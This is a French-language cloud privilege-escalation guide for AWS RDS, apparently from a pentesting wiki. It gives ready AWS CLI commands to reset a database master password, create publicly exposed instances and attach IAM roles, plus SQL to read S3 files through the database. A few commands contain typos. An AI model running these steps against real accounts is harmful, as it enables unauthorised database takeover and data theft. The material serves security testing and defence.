AWS - RDS Privesc

RDS - Relational Database Service

Pour plus d'informations sur RDS, consultez :

rds:ModifyDBInstance

Avec cette permission, un attaquant peut modifier le mot de passe de l'utilisateur principal, et se connecter à la base de données :

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Impact Potentiel : Trouver des informations sensibles à l'intérieur des bases de données.

rds-db:connect

Selon les docs, un utilisateur avec cette permission pourrait se connecter à l'instance DB.

Abuser des permissions IAM du rôle RDS

Postgresql (Aurora)

D'abord, vous pouvez vérifier si cette base de données a été utilisée pour accéder à un autre service AWS. Vous pouvez vérifier cela en regardant les extensions installées :

SELECT * FROM pg_extension;

Si vous trouvez quelque chose comme aws_s3, vous pouvez supposer que cette base de données a une sorte d'accès à S3 (il existe d'autres extensions telles que aws_ml et aws_lambda).

De plus, si vous avez les permissions pour exécuter aws rds describe-db-clusters, vous pouvez voir là si le cluster a un rôle IAM attaché dans le champ AssociatedRoles. Le cas échéant, vous pouvez supposer que la base de données a été préparée pour accéder à d'autres services AWS. En fonction du nom du rôle (ou si vous pouvez obtenir les permissions du rôle), vous pourriez deviner quels accès supplémentaires la base de données possède.

Maintenant, pour lire un fichier à l'intérieur d'un bucket, vous devez connaître le chemin complet. Vous pouvez le lire avec :

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

Si vous aviez des identifiants AWS bruts, vous pourriez également les utiliser pour accéder aux données S3 avec :

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Mysql (Aurora)

À l'intérieur du mysql, exécutez show variables; et si les variables telles que aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role, ont des valeurs, vous pouvez supposer que la base de données est préparée pour accéder aux données S3.

De plus, si vous avez les permissions pour exécuter aws rds describe-db-clusters, vous pouvez vérifier si le cluster a un rôle associé, ce qui signifie généralement l'accès aux services AWS.

Maintenant, pour lire un fichier à l'intérieur d'un bucket, vous devez connaître le chemin complet. Vous pouvez le lire avec :

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

rds:AddRoleToDBCluster, iam:PassRole

Un attaquant avec les permissions rds:AddRoleToDBCluster et iam:PassRole peut ajouter un rôle spécifié à une instance RDS existante. Cela pourrait permettre à l'attaquant d'accéder à des données sensibles ou de modifier les données au sein de l'instance.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Impact Potentiel: Accès à des données sensibles ou modifications non autorisées des données dans l'instance RDS. Notez que certaines bases de données nécessitent des configurations supplémentaires comme Mysql, qui doit spécifier le rôle ARN dans les groupes de paramètres également.

rds:CreateDBInstance

Avec cette seule permission, un attaquant pourrait créer une nouvelle instance à l'intérieur d'un cluster qui existe déjà et qui a un rôle IAM attaché. Il ne pourra pas changer le mot de passe de l'utilisateur principal, mais il pourrait être capable d'exposer la nouvelle instance de base de données à Internet :

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

rds:CreateDBInstance, iam:PassRole

Un attaquant avec les permissions rds:CreateDBInstance et iam:PassRole peut créer une nouvelle instance RDS avec un rôle spécifié attaché. L'attaquant peut alors potentiellement accéder à des données sensibles ou modifier les données au sein de l'instance.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Impact Potentiel: Accès à des données sensibles ou modifications non autorisées des données dans l'instance RDS.

rds:AddRoleToDBInstance, iam:PassRole

Un attaquant avec les permissions rds:AddRoleToDBInstance et iam:PassRole peut ajouter un rôle spécifié à une instance RDS existante. Cela pourrait permettre à l'attaquant d'accéder à des données sensibles ou de modifier les données au sein de l'instance.

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Impact Potentiel: Accès à des données sensibles ou modifications non autorisées des données dans l'instance RDS.